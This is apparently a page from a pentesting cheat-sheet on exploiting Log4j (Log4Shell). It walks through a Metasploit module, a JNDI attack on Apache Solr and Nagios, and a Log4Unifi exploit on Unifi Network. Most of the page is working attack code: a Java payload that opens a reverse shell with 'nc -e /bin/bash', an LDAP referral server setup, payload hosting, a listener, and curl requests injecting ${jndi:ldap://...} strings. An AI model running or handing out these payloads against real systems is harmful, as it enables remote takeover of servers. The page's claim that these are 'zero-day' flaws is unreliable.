Log4j Pentesting

Log4j has zero-day vulnerabilities to Log4Shell, Log4Unifi.

msfconsole
msf> use exploit/multi/http/log4shell_header_injection
msf> set HTTP_HEADER ACCEPT
msf> set RHOSTS <target-ip>
msf> set SRVHOST <local-ip>
msf> set SRVPORT 1389
# e.g. Nagios
msf> set TARGETURI /~logs
msf> set LHOST <local-ip>
msf> run
shell

Exploit Apache Solr (JNDI)

You need to prepare your four local terminals.

1. Start LDAP Server on Your Local Terminal 1

Install Maven
```
sudo apt install maven
```

Get the Payload

Download the repository.

git clone https://github.com/mbechler/marshalsec.git
cd marshalsec

Then build the marshalsec utility

mvn clean package -DskipTests

Start LDAP Server

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<your-local-ip>:8000/#Exploit"

2. Host the Exploit on Your Local Terminal 2

Create the Exploit with Java

First, create a new directory and create a new exploit named "Exploit.java" in the directory. Open your favorite editor like vim.

mkdir exploit
cd exploit
vim Exploit.java

In editor, enter the following code.

public class Exploit {
static {
    try {
        java.lang.Runtime.getRuntime().exec("nc -e /bin/bash <your-local-ip> <your-local-listener-port>");
    } catch (Exception e) {
        e.printStackTrace();
    }
}
}

Compile the Payload
```
javac Exploit.java -source 8 -target 8
```
Start Web Server to Host the Payload
```
python3 -m http.server 8000
```

3. Open Listener on Your Local Terminal 3

nc -lvnp <your-local-listener-port>

4. Send Request the Target Website

# Apache Solr
curl 'http://<target-ip>:<target-port>/solr/admin/cores?foo=${jndi:ldap://<local-ip>:1389/Exploit}'

# Nagios
curl http://<target-ip>:<target-port>/~logs -H 'Accept: ${jndi:ldap://<local-ip>:1389/Exploit}'

Exploit Unifi Network using Log4Unifi

Log4Unifi is an exploitation Log4j tool in Unifi Network.

1. Test the Vulnerability in the Target Web Page

curl -i -s -k -X POST -H $'Host: vulnerable.com:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://9ulral.dnslog.cn:1389/o=tomcat}\",\"strict\":true}' $'https://<target-ip>:8443/api/login'

2. Open Listener on Your Local Machine

nc -lvnp 4444

3. Exploit

Download the exploit from the repository.

git clone https://github.com/puzzlepeaches/Log4jUnifi
cd Log4Unifi

Exploit

python exploit.py -u https://<target-ip>:8443 -i <your-local-ip> -p 4444

PreviousLLM Chatbot Pentesting NextMicrosoft Exchange Server Pentesting

Last updated 1 month ago

hashtagExploit Apache Solr (JNDI)

hashtag1. Start LDAP Server on Your Local Terminal 1

hashtag2. Host the Exploit on Your Local Terminal 2

hashtag3. Open Listener on Your Local Terminal 3

hashtag4. Send Request the Target Website

hashtagExploit Unifi Network using Log4Unifi

hashtag1. Test the Vulnerability in the Target Web Page

hashtag2. Open Listener on Your Local Machine

hashtag3. Exploit